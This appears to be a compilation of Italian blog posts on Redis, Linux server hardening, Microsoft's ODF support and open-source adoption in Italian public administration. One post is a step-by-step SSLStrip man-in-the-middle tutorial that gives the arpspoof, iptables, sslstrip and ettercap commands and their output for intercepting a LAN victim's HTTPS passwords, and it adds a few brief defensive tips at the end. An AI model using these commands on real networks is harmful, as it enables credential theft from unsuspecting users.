Da qualche giorno ho scoperto Redis e mi sto domando come iniziare ad utilizzarlo. Redis in parole povere è un database che lavora sulla ram, installato su un normale computer con un processore a singolo core riesce ad eseguire più di 100.000 operazioni di lettura/scrittura al secondo. Avete presente memcache, aggiungete il supporto per per le liste e lo storage basato su disco, ecco, questo è più o meno Redis. Redis lo potete usare come database delle code o come server cache o in entrambi i modi.

Forse è meglio farsi spiegare cos’è Redis dal suo sviluppatore “Salvatore Sanfilippo”

Redis è un database un pò bizzarro, rispetto ai canoni a cui siamo abituati, per due motivi principali:

1) Tiene tutti i dati in memoria anche se persiste sul disco. In pratica il disco serve solo nel caso in cui il database viene fermato e riavviato, a leggere nuovamente tutto il data set in memoria. Ma tutti gli accessi in lettura e scrittura vengono gestiti principalmente in RAM. Questo permette ad un singolo server Redis che gira su una macchina Linux normalissima, su un solo core, di raggiungere l’interessante prestazione di 100 mila query al secondo. Cosa più interessante le query in lettura e scrittura prendono lo stesso tempo.

2) Le operazioni che supporta sono molto diverse da quelle di un database SQL. Non c’è il concetto di tabella, e non è un semplice database Key-Value a cui si associa ad una stringa (la chiave) un’altra stringa (il valore). Infatti i valori possono essere di altri tipi, come liste, insiemi, insiemi ordinati, o semplicemente stringhe.

Tratto da un’intervista di Salvatore Sanfilippo su ossblog.it

Bhe vediamo di smanettarci un po’ su…

Prima di tutto bisogna installare il server, su un sistema come ubuntu eseguiamo:

 sudo apt-get install redis-server

Appena installato il server partirà sulla porta 6379. Per accedere tramite PHP al server Redis esistono molteplici librerie tra le quali: Predis e Rediska. Invece su questo link trovate le librerie Redis per tutti gli altri linguaggi.

Senza che faccio copia e incolla, cosa che non mi piace tanto, potete trovare degli esempi su: kevin.vanzonneveld.net, predis, antirez.com.

Qua trovate un articolo interessante sulle prestazioni.

Poi se non vi va d’installare niente potete sempre fare una prova su questo sito.

La documentazione ufficiale la trovate qua.

Se vi piace il progetto e avete 30 minuti liberi potete leggere Redis Zero To Master In 30 Minutes

Saluti a tutti, scusate se stavolta sono stato proprio rapido…

Premesso che la sicurezza in modo assoluto non esiste, oggi affronteremo un argomento molto vasto e complesso l’hardening di un sistema linux, cioè come rendere più sicuro un sistema esposto sulla rete. In realtà non esiste una guida o “la guida” per mettere in sicurezza un sistema linux ma esistono delle regole per evitare che un sistema sia meno attaccabile. Inoltre, questa non vuole essere una guida esaustiva ma una specie di promemoria sulle operazioni da compiere appena installato un sistema linux.
Questo promemoria sull’hardening di un sistema linux è destinato a persone che hanno un po’ di esperienza su linux, particolari conoscenze o riti arcani non servono, basta conoscere un po’ il sistema che si intende modificare e i concetti base di linux, comunque, se ricopiate paro paro i comandi senza ragionare rischiate di rendere inaccessibile il vostro sistema.

Le partizioni e il filesystem

Come tutti sanno la radice del filesystem può essere su un unica partizione oppure articolata con diversi punti di montaggio. Come da molte guide che si possono trovare in giro per la rete è ormai assodato che le directory /tmp , /var , /usr e /home vanno montate in partizioni separate.

• Il punto di montaggio /tmp è pubblico, cioè tutti gli utenti devono avere la possibilità di scrivere, quindi, un aumento spropositato di questo punto di montaggio potrebbe mettere in crisi tutto il sistema se esso fosse su un’unica partizione. Non conviene montare questa partizione con l’opzione noexec poiché spesso alcuni software usano questa posizione per installare/aggiornare i pacchetti. Poi, se si è abbastanza paranoici come il sottoscritto, si può montare la partizione con l’opzione noexec, quando bisognerà fare manutenzione sul sistema /tmp verrà smontata e rimontata senza l’opzione noexec.
• Il punto di montaggio /var è altrettanto importante per quanto riguarda la sicurezza del sistema, specialmente per la presenza di /var/log, in esso vengonono salvati i log di sistema e in caso di un attacco DOS o un brute force potrebbe aumentare a dismisura. Questa partizione si può montare tranquillamente con l’opzione noexec.
• Il punto di montaggio /usr va montato in sola lettura, da smontare e rimontare in scrittura quando bisogna fare manutenzione al sistema.
• Per il punto di montaggio /home è buona cosa usare una partizione separata, per una serie infinita di motivi, tra i quali vi è la necessità di montare la partizione con l’opzione noexec. Questo si fa per evitare che un utente possa caricare un eseguibile bacato con l’intento di sfruttare lo stesso eseguibile per ottenere i privilegi di amministratore tramite shellcode.

Già queste impostazioni garantiscono una buona sicurezza, poi se si è abbastanza paranoici si può pensare di togliere il bit SUID/SGID da molti eseguibili non strettamente necessari, dipende da sistema a sistema. In caso si utilizza un sistema virtuale in remoto si potrebbe anche utilizzare le quote per settare le dimensioni massime che devono avere le cartelle.
Se siete sysadmin molto paranoici come il sottoscritto, subito dopo l’installazione del sistema ci si può calcolare hash di alcuni file sensibili: grep, ls, ps, netstat ecc; infatti, essi sono i primi che un probabile un attaccante modifica per nascondersi nel sistema. Per questa operazione è meglio usare MD5 e SHA1 al posto di MD2 e MD4 che sono algoritmi già violati (teoricamente anche l’MD5 è violabile ma solo in determinate condizioni che non rientrano nel nostro caso). Logicamente ad ogni aggiornamento bisogna ricalcolare gli hash, ci si può costruire facilmente uno script che faccia questo.

Utenti

Per un servizio che è costantemente esposto sulla rete i nomi utente giocano un ruolo molto importante se non fondamentale. Da molti bruteforce subiti, sicuramente da parte di bot che scansionano la rete alla ricerca di sistemi vulnerabili, i nome utente più attaccati sono: root, admin, administrator, testing, spam, postgres, ftpuser, user, newsletter, fax, ftp, office, training, demo, oracle, master, contact, staff, sales, backup, info, test, marketing, smtp, bob, windows, webmaster, mysql, anonymous, guest, ecc., quindi di conseguenza utilizzare questi nome utente per i servizi non è un’idea molto buona, usare questi username si semplifica del 50% il compito di un eventuale attaccante.
Una buona soluzione è quella di utilizzare per i nome utente regole simili quelle delle passwords o quasi. Per esempio, all’utente Mario Rossi si potrebbe impostare un nome utente tipo “MarioRossi123z” oppure “mrossi56ScF” e così via. La stesso concetto si può estendere anche agli accessi ftp o mail se si fornisce un servizio di hosting o simili.
Vietare l’accesso ssh agli utenti e non permettere l’utilizzo di shell, altrimenti un utente malintenzionato potrebbe compilare o caricare un eseguibile con un bug costruito ad hoc e attraverso esso ottenere i privilegi di root. Impostando la partizione /home con noexec, vietando agli utenti l’utilizzo di shell e dei compilatori possiamo stare relativamente tranquilli.

Volendo essere paranoici ci si può costruire uno script che analizza ogni ora o mezzora i log di sistema e ad un tot numero di login falliti da parte di un ip metta in banlist lo stesso. Ci si può inventare un pò di tutto, basta un pò di fantasia.

Servizi

I servizi senza ombra di dubbio sono la via d’accesso dei nostri potenziali intrusi, dire che bisogna mantenere aggiornato il software è abbastanza scontato, quindi, la prima regola è un update di sicurezza giornaliero.
La scelta migliore che si possa fare è chiudere tutti i servizi che non ci servono e rinforzare quelli che offriamo. Come prima cosa eliminare totalmente telnet e simili, se per caso sono installati, ma ormai neanche nelle installazioni di default ci stanno sti servizi. Successivamente controlliamo quali servizi sono aperti digitando da terminale:

netstat -t -u -l

oppure se preferiamo il numero delle porte

netstat -t -u -l --numeric-ports

dovremmo ottenere un output simile a questo

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address      Foreign Addr  State
tcp        0      0 *:pop3s                *:*       LISTEN
tcp        0      0 *:mysql                *:*       LISTEN
tcp        0      0 *:pop3                 *:*       LISTEN
tcp        0      0 *:imap                 *:*       LISTEN
tcp        0      0 localhost.locald:domain*:*       LISTEN
tcp        0      0 *:smtp                 *:*       LISTEN
tcp        0      0 *:imaps                *:*       LISTEN
tcp        0      0 *:http                 *:*       LISTEN
tcp        0      0 *:domain               *:*       LISTEN
tcp        0      0 *:ftp                  *:*       LISTEN
tcp        0      0 *:https                *:*       LISTEN
tcp        0      0 *:ssh                  *:*       LISTEN
udp        0      0 localhost.locald:domain*:*
udp        0      0 localhost.locald:domain*:*
udp        0      0 *:36593                *:*
udp        0      0 *:domain               *:*

Vediamo dove intervenire

Mettere in sicurezza SSH

Come detto in precedenza solo gli admin o l’admin dovrebbe essere abilitato a questo accesso, gli altri utenti non devono poter accedere a questo servizio. Inoltre, molto importante è disabilitare l’accesso all’utente root, i privilegi di superutente verranno acquisiti dagli admin tramite il comando su.
Apriamo il file /etc/ssh/sshd_config con un editor, per disabilitare l’accesso a root, lasciare l’accesso solo ad alcuni utenti e vietare l’uso di password vuote, modificare come segue le seguenti linee

PermitRootLogin no
AllowUsers pincopallino, secondopinco
PermitEmptyPasswords no

Una buona idea è cambiare la porta predefinita del servizio e forzare l’utilizzo del protocolo 2

Port 65000
Protocol 2

eventualmente per impedire l’utilizzo di sftp commentare la riga

#Subsystem    sftp    /usr/libexec/openssh/sftp-server

eventualmente se si volesse modificare il banner di presentazione del servizio, prima bisogna de-commentare la seguente riga e successivamente impostare una path dove salvare un file di testo con il banner

#Banner /some/path

modificato tutto, bisogna riavviare il servizio sshd stando attenti a non fare alcun errore, se si opera in remoto si rischia di autoescludersi dal sistema.

In caso la paranoia si fa sentire, si può abilitare l’accesso a ssh soltanto in possesso di una chiave crittografica impostando nel file di configurazione

PubkeyAuthentication yes

successivamente bisognerà generare una chiave privata e una pubblica per ogni utente a cui si vuole dare l’accesso, maggiori informazioni su http://sial.org/howto/openssh/publickey-auth o http://www.openssh.com, l’accesso si effettua soltanto con la chiave e non verrà richiesta alcuna password.
Inoltre, possiamo fare in modo che ogni utente loggato lavori in un abiente simile ad un sistema linux ma limitato di alcuni comandi utilizzando un fake chroot, oppure, possiamo prevedere l’apertura della porta ssh con il port knocking (la classica bussata segreta) per queste e altre tecniche rimando sempre al sito ufficiale di openssh, altrimenti questo articolo diventerebbe troppo lungo.

Gli altri servizi

Secondo il mio punto di vista sono da prediligere pop3s, smtps e imaps e da chiudere pop3, smtp e imap a meno che non abbiate degli utenti che li utilizzano, in tal caso bisognerà costruire una specie di piano d’uscita da questi servizi obsoleti.

Limitare un SYN Flood

Questo era un attacco DOS molto comune alla fine del secolo scorso, le recenti impostazioni di rete tendono a limitare o annullare del tutto questo tipo di attacco. L’attacco tende a saturare le risorse di sistema, una descrizione dell’attacco la si può trovare su http://www.cert.org/advisories/CA-1996-21.html . Per limare ulteriolmente le impostazioni di sicurezza rispetto a quelle della vostra rete si possono utlizzare i SYN cookies, essi limitano il numero di richieste da parte di un singolo utente. Aprire il file /etc/sysctl.conf (è un file di configurazione del kernel) ed editare le seguenti linee

#Prevent SYN attack
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = xxx
net.ipv4.tcp_synack_retries = 2

e le successive linee per la protezione contro l’IP Spoofing

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

poi se si desidera configurare la distribuzione come un firewall possiamo utilizzare la configurazione proposta da http://openskill.info/infobox.php?ID=1166

net.ipv4.ip_forward = 1
net.ipv4.ip_dynaddr = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_sack = 0
net.ipv4.tcp_timestamps = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_fin_timeout = 30
net.ipv4.tcp_window_scaling = 0
net.ipv4.tcp_syn_retries = 3
net.ipv4.tcp_synack_retries = 3
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.log_martians = 1
net.ipv4.conf.all.rp_filter = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.log_martians = 1
kernel.printk = 1 4 1 7
##
net.ipv4.tcp_max_syn_backlog=1280
net.ipv4.conf.all.send_redirects=0
net.ipv4.conf.all.forwarding=0
net.ipv4.conf.all.mc_forwarding=0
net.ipv4.vs.timeout_timewait=60

Conclusioni

Secondo il mio punto di vista questo è il minimo sindacale per mettere in sicurezza il nostro sistema esposto ai rischi della rete. Certo l’hardening non finisce qua, anzi, questa è solo la punta dell’iceberg, è compito di ogni sistemista documentarsi e apprendere giorno per giorno nuove tecniche, anche tentando di violare i propri sistemi per saggiarne la sicurezza.

In rete si trovano numerosi script che ci aiutano in questo compito, magari in un prossimo futuro farò un articolo in merito.

Saluti

Oggi si parla di sicurezza informatica, o di insicurezza informatica dipende dai punti di vista. SSL Strip è una tecnica presentata al Black Hat DC del 2009 che rientra nella categoria dei MITM (Main in the middle). All’interno di una rete LAN, questa tecnica permette di sniffare le password provenienti da un server sicuro, HTTPS per fare un esempio. Questa tecnica risulta molto pericolosa, in quanto, se un malintenzionato riuscisse ad entrare in una qualsiasi rete LAN o rete wireless (abitazione, ufficio, ecc) potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook, twitter, instantempo e perfino i dati bancari. La tecnica, a grandi linee, molto semplicemente, consiste nel far in modo che il computer dell’attaccante si metta in mezzo tra il computer della vittima e il router, il computer dell’attaccante diventa un “nodo invisibile” su cui vengono veicolate tutte le informazioni. A fine articolo si abbozzeranno delle soluzioni al problema.

Configurazione di SSL Strip

Il sistema che userò per configurare gli script e i programmi è Ubuntu 10.4, per diversi motivi: i sorgenti e i comandi sono progettati per un sistema Linux; su un altro sistema non si possono fare tutte le modifiche che ci si propone di fare; sono molti anni che uso Ubuntu e lo conosco fin nei minimi particolari.

La prima operazione da fare è scaricare SSLStrip da: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

Scompattare il pacchetto, utilizzare “tar -zxvf sslstrip-0.4.tar.gz” se si sta operando da terminale.

arturu@arturu-laptop:~/Scrivania$ tar -zxvf sslstrip-0.7.tar.gz
sslstrip-0.7/
sslstrip-0.7/setup.py
sslstrip-0.7/README
sslstrip-0.7/COPYING
sslstrip-0.7/lock.ico
sslstrip-0.7/sslstrip/
sslstrip-0.7/sslstrip/StrippingProxy.py
sslstrip-0.7/sslstrip/URLMonitor.py
sslstrip-0.7/sslstrip/ServerConnectionFactory.py
sslstrip-0.7/sslstrip/__init__.py
sslstrip-0.7/sslstrip/ServerConnection.py
sslstrip-0.7/sslstrip/ClientRequest.py
sslstrip-0.7/sslstrip/SSLServerConnection.py
sslstrip-0.7/sslstrip/CookieCleaner.py
sslstrip-0.7/sslstrip.py
arturu@arturu-laptop:~/Scrivania$

Il file compresso viene estratto in una cartella, entrare nella cartella e compilare il codice sorgente con “python setup.py build” (è necessario avere installato l’interprete python)

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ python setup.py build
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-i686-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
Cleaning up...
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Successivamente bisogna installare tutto con il comando “sudo python setup.py install”

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo python setup.py install
[sudo] password for arturu:
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.6.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.6.egg-info
Cleaning up...
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Appena installato SSLStrip, bisogna procedere all’installazione di arpspoof. Arpspoof è un programma che fa credere ad un host (computer della vittima) che l’indirizzo MAC dell’attaccante è l’indirizzo MAC del router (contaminando i pacchetti arp, ma questo è un altro discorso), così facendo la vittima inizia ad inviare all’attaccante tutto il suo traffico di rete; il kernel dell’attaccante, ad eccezione per il traffico destinato alla porta 80, reindirizza tutto a $ listenPort (10000, per esempio).

Installiamo arpspoof con il comando “sudo apt-get install dsniff” e successivamente installiamo Ettercap (altro famoso tool per la cattura dei pacchetti) con il comando “sudo apt-get install ettercap”.

Adesso che abbiamo installato tutto il software si può passare all’utilizzo.

Utilizzo di SSLStrip

Da ora in poi facciamo finta che noi siamo gli attaccanti e Mario sia la nostra vittima. Come prima cosa bisogna conoscere il nostro indirizzo ip all’interno della rete LAN, da terminale digitiamo “ifconfig”

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ ifconfig
eth0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:0 (0.0 B)  Byte TX:0 (0.0 B)
          Interrupt:21
wlan0  Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          indirizzo inet:10.10.100.5  Bcast:10.10.100.255  Maschera:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:41373 errors:0 dropped:0 overruns:0 frame:0
          TX packets:44774 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:27814338 (27.8 MB)  Byte TX:10429284 (10.4 MB)
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Dopo la voce HWaddr abbiamo il nostro indirizzo MAC e dopo inet il nostro indirizzo ip nella rete interna. In questo caso nella mia rete interna ho il seguente indirizzo ip 10.10.100.5 sull’interfaccia wireless, l’ethernet è disattivata; il mio MAC address è 00:00:00:00:00:00 (l’ho modificato perché non mi va di pubblicarlo).

Bisogna trovare l’indirizzo del gateway, è necessario che esso sia uguale a quello della vittima, situazione che si verifica nel 90% dei casi, digitiamo da terminale ” ip route show | grep default | awk ‘{ print $3}’ “

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ ip route show | grep default | awk '{ print $3}'
10.10.100.254
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

in questo caso l’indirizzo del gateway è 10.10.100.254.
Successivamente bisogna aprire tre diverse schede nella finestra del terminale, perché abbiamo bisogno di eseguire tre comandi in parallelo.
Nel primo tab eseguire “sudo arpspoof -t 10.10.100.2 10.10.100.254″, dove il primo indirizzo ip è quello della vittima e il secondo è il gateway (per trovare gli indirizzi dei computer connessi nella LAN basta utilizzare un qualsiasi scanner di rete), il risultato è simile al seguente (ho modificato i MAC address) praticamente ogni pacchetto della vittima in ogni instantempo viene fatto passare attraverso il nostro computer e inviato al router vero, e viceversa.

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo arpspoof -t 10.10.100.2 10.10.100.254
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00

Nella seconda scheda eseguiamo il comando “iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1000″, serve a renderizzare le richieste dalla porta 80 alla porta 1000 del nostro computer (la porta di destinazione la possiamo cambiare a piacere, in caso fosse già utilizzata da un altro servizio).

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Subito dopo facciamo partire “sslstrip” e si lascia in esecuzione

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sslstrip
sslstrip 0.6 by Moxie Marlinspike running...

Nella terza tab facciamo partire ettercap in sniff mode con il seguente comando “sudo ettercap -Tqz”, aspettiamo che la nostra vittima digiti login e password su una connessione “sicura”, il risultato dovrebbe essere il seguente (ho modificato il mio MAC address)

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo ettercap -Tqz
[sudo] password for arturu:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan... (Wireless)
  wlan0 ->	00:00:00:00:00:00      10.10.100.5     255.255.255.0
Privileges dropped to UID 65534 GID 65534...
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help

Fatto questo appena un utente tenterà di accedere ad un servizio su un server protetto, ettercap intercetterà username e password e la visualizzerà in questa ultima tab.

Utilizzo di SSLStrip secondo la documentazione

Secondo gli autori di SSLStrip l’utilizzo del tool dovrebbe essere il seguente:

• Flip your machine into forwarding mode. (echo “1″ > /proc/sys/net/ipv4/ip_forward)
• Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>)
• Run sslstrip. (sslstrip.py -l <listenPort>)
• Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

In questo modo non sono mai riuscito a beccare una password, forse qualcun altro sarà più fortunato.

Un articolo interessante si può leggere su: http://pointnext.blogspot.com/2010/01/ssl-strip-con-ettercap.html ma ancora non ho avuto il tempo di provare.

Funziona sempre?

Dalle prove che ho fatto se la vittima lavora su una macchina Windows (ho provato soltanto con XP e Vista) l’attacco va a buon fine con qualsiasi browser. Safari su MacOsX restituisce pagina bianca, cioè non fa nessuna operazione e l’attacco non va a buon fine, ma l’utente non riceve nessuna segnalazione sul fatto che la connessione sicura è stata compromessa. Su Ubuntu utilizzando firefox o chrome si viene avvertiti che il certificato di sicurezza non è valido e l’utente può decidere di abbandonare la connessione (comunque se l’utente accetta il certificato viene restituita una pagina bianca), invece con Opera l’attacco va a buon fine.

Soluzioni

Per ora le soluzioni che mi sento di suggerire sono:

• Se è possibile, preferire il cavo alla wireless, infatti è più difficile connettersi ad una LAN con il cavo che non tramite wireless anche se è protetta;
• Aggiornare browser e Sistema Operativo sperando che venga risolto il problema (caso molto probabile in quanto questo problema è noto dal 2009);
• Consiglio di parte: utilizzare un sistema operativo più sicuro degli altri ad es: Ubuntu o MacOsX

Saluti Arturu.it

PS Come tutti hanno capito non si trattava di un articolo che parla dello “Strip” Tease. Tu lettore, se ancora cerchi questo, leggendo ancora non troverai niente, anche perché: l’articolo è finito…

La Microsoft con il rilascio del secondo service pack (SP2) per Office 2007, adotterà nativamente il formato ODF (quello di Open Office per intendersi). Con questo aggiornamento gli utenti avranno la possibilità di impostare ODF in modo predefinito. Inizialmente, la notizia ha stupito tutti, in seguito ha sollevato un sacco di opinioni e pareri contrastanti.

Riassunto delle puntate precedenti

Per chi non fosse del settore riassumo velocenmente cosa è successo in questi ultimi anni.

I positivisti

Molte sono le persone entusiaste di questa notizia perché vedono in questa novità diversi lati positivi:

I Dubbiosi

Questa svolta inaspettata fa pensare, persone che lavorano nel settore pensano che visti i precedenti della Microsoft con i formati aperti bisgogna dubitare. In effetti qualche precedente c’è, ad esempio lo stravolgimento dell’HTML a partire dal ’96/98 quando Internet Explorer è divenuto il browser più utilizzato (chiunque voglia approfondire può leggere questo articolo di Wikipedia).

Alcuni sospettano, dopo le dichiarazioni di microsoft che ODF non sarà supportato con tutte le sue funzionalità, che si voglia far fare un confronto tra i due formati in modo che l’utente scelga OOXML.

Jason Matusow, director of corporate standards di Microsoft, e Doug Mahugh, senior product manager per OOXML, hanno fornito maggiori dettagli sull’implementazione di ODF in questa intervista apparsa su BetaNews. Mahugh ha spiegato che non tutte le funzionalità fornite da Office 2007 sono supportate da ODF: tra queste, ad esempio, gli oggetti SmartArt, la formattazione condizionale e alcuni tipi di grafico di Excel. Per aggirare questo ostacolo, che è poi il problema più rilevante nella conversione tra differenti formati di documento, Microsoft farà in modo che, al momento del salvataggio in ODF, l’utente venga avvisato di eventuali elementi che potrebbero essere persi o non correttamente convertiti.

Secondo alcuni, questo supporto parziale convincerà gli utenti che ODF è un formato inferiore ad OOXML facendo scegliere per il secondo. Il supporto parziale potrebbe far visualizzare in modo differente i documenti costruiti con Office con le altre suite. Molti sono convinti che questa è una strategia della Microsoft per consolidare la sua posizione di monopolista e ostacolare la crescita della concorrenza.

Conclusioni

Che la Microsoft sia in calo è un dato certo (un pò meno in Italia). La decisione di adottare ODF nativamente è il minimo da fare per non rimanere fuori dal mercato, visto che, sotto la pressione dei sostenitori delle libertà digitali, le Pubbliche Amministrazioni stanno puntanto sui formati aperti. E’ successo in Inghilterra che le scuole del regno hanno rifiutato Microsoft perché non forniva formati standard e aperti, ci sarebbe stata un’intera generazione cresciuta con OpenOffice, eventualità disastrosa per Microsoft perché successivamente l’utilizzo di OpenOffice si sarebbe trasferito anche all’ambito lavorativo.

Questa è una scelta per rimanere a galla e non perdere posizioni. Starà a noi e agli organi antitrust vigilare in modo che la Microsoft non si ripeta come è successo in passato.

Diagnosi precoce, prevenzione, appropriatezza della cura. Principi fondamentali della sanità che consentono al paziente di sentirsi più protetto e sicuro, soddisfatto nei suoi bisogni di salute, tranquillo nell’affidarsi ad un équipe medica o ad un sistema organizzativo sanitario in grado di assistere il paziente a 360 gradi e in modo tempestivo ed efficace.

Il fenomeno dell’open source continua a diffondersi nelle Pubbliche Amministrazioni (PA). Dopo anni e anni di imposizione di formati e di software proprietari incomincia a diffondersi una filosofia di condivisione e di assolutà libertà. Una delle prime amministrazioni locali a fare il passo è stata la provincia autonoma di Bolzano che ha incominciato ad utilizzare i fondi europei (vedi dettagli) per far migrare le proprie scuole dal costosissimo e incostituzionale software proprietario all’Open Source, successivamente ha incominciato ad estendere l’utilizzo all’intera amministrazione pubblica, abbattendo i costi delle licenze software del 100% (cioè l’acquisto e l’aggiornamento dei programmi), rimangono solo i costi relativi alla manutenzione. Dopo questo successo economico…

Dopo questo successo economico e costituzionale questa politica ha incominciato a diffondersi in tutte le pubbliche amministrazioni italiane come ad esempio quella della provincia di Bari che ha dato il via al progetto:

“Disegno di Legge Regionale recante norme in materia di trasformazione ed adeguamento tecnologico della Pubblica Amministrazione Regionale secondo criteri di difesa della libertà, della democrazia e della sicurezza informatica nell’era della comunicazione digitale”.

“Per la prima volta in Italia – si legge in una nota diffusa dal PRC – viene proposto un disegno di legge regionale che si propone di regolamentare e trasformare la Pubblica Amministrazione attraverso l’adozione di un altro modello di impiego e di realizzazione del software utilizzato nella Pubblica Amministrazione passando da quello proprietario, costosissimo, a codice chiuso, immodificabile e con licenza d’uso a pagamento, a quello Open Source, modificabile e quasi sempre gratuito ed adattabile ad ogni esigenza dell’utilizzatore”.

Secondo i promotori, “le ricadute positive che deriverebbero dall’approvazione di questo DDL in termini di contenimento dei costi a bilancio, di sviluppo e crescita dell’economia e dell’occupazione sono già evidenti in numerose esperienze già realizzatesi altrove nel mondo, in Italia ed in Europa. Lo stesso DDL affronta, per la prima volta attraverso un atto legislativo, anche il grave problema dell’Hardware condizionato all’uso di software ad alto costo economico e sociale”.

Su questa scia di innovazione e miglioramento (oltre ad altre PA come Puglia, Toscana ed Umbria, e presso enti locali come la provincia di Pescara o i comuni di Torino e Firenze) ieri la Regione Lombardia annuncia che migrerà al software Open Source reinderizzando i fondi risparmiati per far lavorare i giovani programmatori della regione, in questo modo si evita di mandare i propri fondi all’estero e lasciare senza lavoro altrettanti validi giovani programmatori italiani. L’intervista fatta all’autore di questo progetto si può leggere cliccando qui, invece il testo della proposta di legge si può trovare cliccando qui.

Sulla scia del fenomeno Open Source il governo recentemente ha aperto un portale dedicato all’Open che si può trovare cliccando qui. Questo nuovo portale serve principalmente per favorire la collaborazione, la cooperazione, la condivisione delle informazioni e del supporto all’Open alle diverse PA, evitando quello che è successo fino ad ora a causa dell’utilizzo del software proprietario, cioè mi riferisco a tutte quelle problematiche comuni a tutte le PA che si ripresentano spesso e che devo essere risolte in modo autonomo a causa delle restizioni di questi software, invece con l’utilizzo dei Software Open Source la soluzione di un problema viene messa a disposizione di tutti facendo risparmiare tempo e denaro in quanto la condivisione dei dati e delle conoscenze è alla base di tutto il sistema.

Un Saluto, Arturu.

PS Riflettete… E’ meglio collaborare ed essere un’unico continente che essere migliaia di isole sparse per l’oceano…